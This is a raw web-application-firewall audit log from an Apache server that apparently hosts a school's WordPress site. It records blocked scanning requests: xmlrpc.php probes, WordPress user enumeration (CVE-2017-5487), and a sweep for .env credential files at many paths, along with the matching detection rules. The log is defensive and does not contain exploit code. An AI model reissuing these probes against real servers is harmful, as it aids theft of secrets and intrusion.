"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746778078630814 2763 (- - -) Stopwatch2: 1746778078630814 2763; combined=1291, p1=432, p2=768, p3=0, p4=0, p5=91, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f1c7276-Z-- --991c2810-A-- [09/May/2025:15:08:03 +0700] aB234y-fAO47ojYKsMo6-wAAAEc 103.236.140.4 52152 103.236.140.4 8181 --991c2810-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --991c2810-C-- demo.sayHello --991c2810-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --991c2810-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746778083690167 6239 (- - -) Stopwatch2: 1746778083690167 6239; combined=4898, p1=614, p2=4037, p3=42, p4=45, p5=99, sr=76, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --991c2810-Z-- --ff17e65c-A-- [09/May/2025:15:10:14 +0700] aB24ZlqQ1nOVx9fWpZTxbwAAAA0 103.236.140.4 33178 103.236.140.4 8181 --ff17e65c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.149.195.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.149.195.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ff17e65c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff17e65c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746778214457816 2675 (- - -) Stopwatch2: 1746778214457816 2675; combined=1021, p1=342, p2=652, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff17e65c-Z-- --2e8d3b11-A-- [09/May/2025:15:16:09 +0700] aB25yR6q_ZMebht3q152-gAAAJc 103.236.140.4 59278 103.236.140.4 8181 --2e8d3b11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.120.135.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.120.135.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e8d3b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e8d3b11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746778569309451 2479 (- - -) Stopwatch2: 1746778569309451 2479; combined=1119, p1=364, p2=725, p3=0, p4=0, p5=30, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e8d3b11-Z-- --1838e660-A-- [09/May/2025:15:30:52 +0700] aB29PFqQ1nOVx9fWpZQGWwAAABI 103.236.140.4 35962 103.236.140.4 8181 --1838e660-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1838e660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1838e660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779452523880 700 (- - -) Stopwatch2: 1746779452523880 700; combined=290, p1=263, p2=0, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1838e660-Z-- --7ec1762f-A-- [09/May/2025:15:30:52 +0700] aB29PB6q_ZMebht3q16G5QAAAJY 103.236.140.4 35992 103.236.140.4 8181 --7ec1762f-B-- POST /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --7ec1762f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ec1762f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779452893178 826 (- - -) Stopwatch2: 1746779452893178 826; combined=378, p1=336, p2=0, p3=0, p4=0, p5=42, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ec1762f-Z-- --72f19b16-A-- [09/May/2025:15:30:53 +0700] aB29PVoC-7ITMWTA_c-5QwAAANI 103.236.140.4 36018 103.236.140.4 8181 --72f19b16-B-- GET /conf/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --72f19b16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f19b16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779453253065 1021 (- - -) Stopwatch2: 1746779453253065 1021; combined=498, p1=451, p2=0, p3=0, p4=0, p5=47, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f19b16-Z-- --56f83245-A-- [09/May/2025:15:30:53 +0700] aB29PVoC-7ITMWTA_c-5RgAAAMA 103.236.140.4 36040 103.236.140.4 8181 --56f83245-B-- POST /conf/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --56f83245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56f83245-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779453610875 829 (- - -) Stopwatch2: 1746779453610875 829; combined=305, p1=264, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56f83245-Z-- --b7529d57-A-- [09/May/2025:15:30:53 +0700] aB29PS-fAO47ojYKsMpPBQAAAEs 103.236.140.4 36070 103.236.140.4 8181 --b7529d57-B-- GET /wp-content/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b7529d57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7529d57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779453976688 921 (- - -) Stopwatch2: 1746779453976688 921; combined=361, p1=321, p2=0, p3=0, p4=0, p5=40, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7529d57-Z-- --17273438-A-- [09/May/2025:15:30:54 +0700] aB29Ph6q_ZMebht3q16G7gAAAJI 103.236.140.4 36096 103.236.140.4 8181 --17273438-B-- POST /wp-content/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --17273438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17273438-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779454338092 795 (- - -) Stopwatch2: 1746779454338092 795; combined=359, p1=324, p2=0, p3=0, p4=0, p5=35, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17273438-Z-- --ddaef972-A-- [09/May/2025:15:30:54 +0700] aB29Ph6q_ZMebht3q16G9AAAAJA 103.236.140.4 36118 103.236.140.4 8181 --ddaef972-B-- GET /wp-admin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ddaef972-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddaef972-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779454705474 782 (- - -) Stopwatch2: 1746779454705474 782; combined=332, p1=286, p2=0, p3=0, p4=0, p5=45, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddaef972-Z-- --d082fd10-A-- [09/May/2025:15:30:55 +0700] aB29Py-fAO47ojYKsMpPDQAAAEI 103.236.140.4 36148 103.236.140.4 8181 --d082fd10-B-- POST /wp-admin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --d082fd10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d082fd10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779455058199 717 (- - -) Stopwatch2: 1746779455058199 717; combined=324, p1=292, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d082fd10-Z-- --61b5071d-A-- [09/May/2025:15:30:55 +0700] aB29Px6q_ZMebht3q16G-AAAAJc 103.236.140.4 36182 103.236.140.4 8181 --61b5071d-B-- GET /library/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --61b5071d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61b5071d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779455413503 792 (- - -) Stopwatch2: 1746779455413503 792; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61b5071d-Z-- --5d705a2f-A-- [09/May/2025:15:30:55 +0700] aB29Px6q_ZMebht3q16G-wAAAII 103.236.140.4 36208 103.236.140.4 8181 --5d705a2f-B-- POST /library/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --5d705a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d705a2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779455783671 652 (- - -) Stopwatch2: 1746779455783671 652; combined=259, p1=224, p2=0, p3=0, p4=0, p5=35, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d705a2f-Z-- --db521320-A-- [09/May/2025:15:30:56 +0700] aB29QC-fAO47ojYKsMpPFAAAAE0 103.236.140.4 36234 103.236.140.4 8181 --db521320-B-- GET /new/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --db521320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db521320-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779456151060 881 (- - -) Stopwatch2: 1746779456151060 881; combined=428, p1=389, p2=0, p3=0, p4=0, p5=38, sr=195, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db521320-Z-- --caae4e45-A-- [09/May/2025:15:30:56 +0700] aB29QFoC-7ITMWTA_c-5TAAAANE 103.236.140.4 36264 103.236.140.4 8181 --caae4e45-B-- POST /new/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --caae4e45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --caae4e45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779456506023 615 (- - -) Stopwatch2: 1746779456506023 615; combined=244, p1=212, p2=0, p3=0, p4=0, p5=32, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --caae4e45-Z-- --73ebfc2d-A-- [09/May/2025:15:30:57 +0700] aB29QS-fAO47ojYKsMpPFQAAAEc 103.236.140.4 36302 103.236.140.4 8181 --73ebfc2d-B-- GET /vendor/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --73ebfc2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73ebfc2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779457094107 781 (- - -) Stopwatch2: 1746779457094107 781; combined=353, p1=319, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73ebfc2d-Z-- --7b9f6648-A-- [09/May/2025:16:02:44 +0700] aB3EtC-fAO47ojYKsMpxEQAAAE0 103.236.140.4 58538 103.236.140.4 8181 --7b9f6648-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.231.130.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.231.130.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7b9f6648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b9f6648-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746781364049862 2855 (- - -) Stopwatch2: 1746781364049862 2855; combined=1239, p1=402, p2=801, p3=0, p4=0, p5=36, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b9f6648-Z-- --fdf69955-A-- [09/May/2025:16:19:16 +0700] aB3IlC-fAO47ojYKsMqEmgAAAFc 103.236.140.4 43746 103.236.140.4 8181 --fdf69955-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.127.222.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.127.222.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fdf69955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdf69955-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746782356497847 2541 (- - -) Stopwatch2: 1746782356497847 2541; combined=1178, p1=429, p2=720, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdf69955-Z-- --9f9cae7b-A-- [09/May/2025:16:24:39 +0700] aB3J1x6q_ZMebht3q169jgAAAJI 103.236.140.4 37826 103.236.140.4 8181 --9f9cae7b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.189.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.189.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9f9cae7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f9cae7b-H-- Message: Access denied 